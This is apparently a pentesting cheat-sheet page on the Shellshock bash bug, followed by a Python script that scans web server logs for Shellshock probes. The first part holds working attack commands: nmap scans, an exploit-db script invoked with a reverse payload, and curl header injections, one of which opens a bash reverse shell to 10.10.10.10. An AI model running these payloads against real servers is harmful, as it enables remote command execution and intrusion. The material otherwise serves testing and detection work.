ShellShock

Description

Iterate over the cgi-bin directory looking for *.sh, *.pl, *.cgi and *.py scripts.

When one script is found, use the nmap http-shellshock script:

nmap -sV -p- --script http-shellshock <target>
nmap -sV -p- --script http-shellshock --script-args uri=/cgi-bin/bin,cmd=ls <target>

If vulnerable, it is possible to exploit it:

# https://www.exploit-db.com/exploits/34900

shellshock.py payload=reverse rhost=10.10.10.56 lhost=<LAB IP> lport=<port> pages=/cgi-bin/user.sh

Or manually through curl:

# Reflected
curl -H 'User-Agent: () { :; }; echo "VULNERABLE TO SHELLSHOCK"' http://10.1.2.32/cgi-bin/admin.cgi 2>/dev/null| grep 'VULNERABLE'

# Blind with sleep (you could also send a ping or web request to yourself and monitor for it with tcpdump)
curl -H 'User-Agent: () { :; }; /bin/bash -c "sleep 5"' http://10.11.2.12/cgi-bin/admin.cgi

# Out-Of-Band Use Cookie as alternative to User-Agent
curl -H 'Cookie: () { :;}; /bin/bash -i >& /dev/tcp/10.10.10.10/4242 0>&1' http://10.10.10.10/cgi-bin/user.sh
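From the defender's side, the same function-definition prefix that the curl probes above place in the User-Agent or Cookie header is what you look for in web server logs. The following is an added example, not code from the original page: it scans Apache/nginx combined-format access log lines for that prefix in the User-Agent and Referer fields; the log lines are constructed samples.

```python
import re

# Shellshock payloads ride in any HTTP header that the CGI wrapper exports as an
# environment variable. They start with a bash function definition, "() {", then a
# body, "}", and a ";" that ends the definition so the trailing command is parsed
# too. This pattern covers the spacing variants on this page: "() { :; };" and "() { :;};".
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{[^}]*\}\s*;")

# Apache/nginx "combined" log format; quoted fields may contain \" escapes.
_QUOTED = r'(?:[^"\\]|\\.)*'
COMBINED_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>' + _QUOTED + r')" '
    + r'(?P<status>\d{3}) \S+ "(?P<ref>' + _QUOTED + r')" "(?P<ua>' + _QUOTED + r')"\s*$'
)

def is_shellshock_payload(header_value: str) -> bool:
    """True when a header value carries the function-definition prefix Shellshock needs."""
    return SHELLSHOCK_RE.search(header_value) is not None

def find_shellshock_probes(lines):
    """Return (client_ip, request_path, header_name) for every line carrying a payload.

    A combined log only records User-Agent and Referer; Cookie-based probes (also shown
    on this page) need a custom LogFormat or a WAF/proxy log to be visible at all.
    """
    hits = []
    for line in lines:
        m = COMBINED_RE.match(line)
        if not m:
            continue  # not a combined-format line: skip rather than guess
        parts = m.group("req").split()
        path = parts[1] if len(parts) > 1 else ""
        for field, name in (("ua", "User-Agent"), ("ref", "Referer")):
            if is_shellshock_payload(m.group(field)):
                hits.append((m.group("ip"), path, name))
    return hits

# Constructed sample log lines (not real traffic); the payloads are the probes from this page.
SAMPLE_LOG = [
    '192.0.2.10 - - [25/Sep/2014:09:12:01 +0000] "GET /index.html HTTP/1.1" 200 1043 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [25/Sep/2014:09:12:05 +0000] "GET /cgi-bin/admin.cgi HTTP/1.1" 200 12 "-" '
    '"() { :; }; echo \\"VULNERABLE TO SHELLSHOCK\\""',
    '198.51.100.7 - - [25/Sep/2014:09:12:09 +0000] "GET /cgi-bin/admin.cgi HTTP/1.1" 200 0 "-" '
    '"() { :; }; /bin/bash -c \\"sleep 5\\""',
    '203.0.113.9 - - [25/Sep/2014:09:12:14 +0000] "GET /cgi-bin/user.sh HTTP/1.1" 500 0 '
    '"() { :;}; echo probe" "curl/7.38.0"',
]
```

To run it over a real log, pass an open file object to find_shellshock_probes instead of SAMPLE_LOG.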
